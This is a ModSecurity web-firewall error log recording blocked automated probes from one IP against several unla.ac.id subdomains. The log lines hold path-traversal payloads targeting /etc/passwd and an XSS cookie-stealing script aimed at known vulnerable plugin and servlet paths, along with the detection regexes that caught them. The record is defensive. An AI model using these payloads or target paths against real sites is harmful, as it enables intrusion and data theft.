[Tue Aug 29 11:41:00.385742 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO123MCo-f0AAAcqJGwAAAAG"]
[Tue Aug 29 11:41:00.399621 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO123MCo-f0AAAcoNOEAAAAF"]
[Tue Aug 29 11:41:00.408914 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAcbSBwAAAAv"]
[Tue Aug 29 11:41:00.409570 2023] [:error] [pid 1841] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAcxbCgAAAAL"]
[Tue Aug 29 11:41:00.412526 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAActbFoAAAAH"]
[Tue Aug 29 11:41:00.414677 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAcqJG0AAAAG"]
[Tue Aug 29 11:41:00.419267 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAYMWTkAAAAR"]
[Tue Aug 29 11:41:00.419378 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAYf-LwAAAAD"]
[Tue Aug 29 11:41:00.419614 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAcsLC0AAAAE"]
[Tue Aug 29 11:41:00.430832 2023] [:error] [pid 1841] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAcxbCkAAAAL"]
[Tue Aug 29 11:41:00.437942 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAcqJG4AAAAG"]
[Tue Aug 29 11:41:00.440207 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAcoNOMAAAAF"]
[Tue Aug 29 11:41:00.443487 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAYf-L0AAAAD"]
[Tue Aug 29 11:41:01.392089 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAcvBc8AAAAJ"]
[Tue Aug 29 11:41:01.393397 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAYMWTsAAAAR"]
[Tue Aug 29 11:41:01.400477 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAcYU7kAAAAp"]
[Tue Aug 29 11:41:01.548517 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAYMWTwAAAAR"]
[Tue Aug 29 11:41:01.551898 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAcYU7wAAAAp"]
[Tue Aug 29 11:41:01.569190 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAAaZ9l4AAAAo"]
[Tue Aug 29 11:41:01.595082 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAYf-MIAAAAD"]
[Tue Aug 29 11:41:01.606575 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAcsLDMAAAAE"]
[Tue Aug 29 11:41:01.617550 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAcYU78AAAAp"]
[Tue Aug 29 11:41:01.618820 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAActbGAAAAAH"]
[Tue Aug 29 11:41:01.618857 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAYf-MMAAAAD"]
[Tue Aug 29 11:41:01.619708 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123cCo-f0AAAcvBdQAAAAJ"]
[Tue Aug 29 11:41:01.622430 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAAYMWT8AAAAR"]
[Tue Aug 29 11:41:01.624530 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAAcbSCQAAAAv"]
[Tue Aug 29 11:41:01.639351 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123cCo-f0AAAcYU8AAAAAp"]
[Tue Aug 29 11:41:01.640140 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAActbGEAAAAH"]
[Tue Aug 29 11:41:01.640565 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO123cCo-f0AAAYf-MQAAAAD"]
[Tue Aug 29 11:41:01.661125 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAaZ9mIAAAAo"]
[Tue Aug 29 11:41:02.380033 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123sCo-f0AAAcoNOUAAAAF"]
[Tue Aug 29 11:41:02.395267 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123sCo-f0AAAcsLDcAAAAE"]
[Tue Aug 29 11:41:02.396857 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123sCo-f0AAAaZ9mQAAAAo"]
[Tue Aug 29 11:41:03.563857 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAcuUmMAAAAI"]
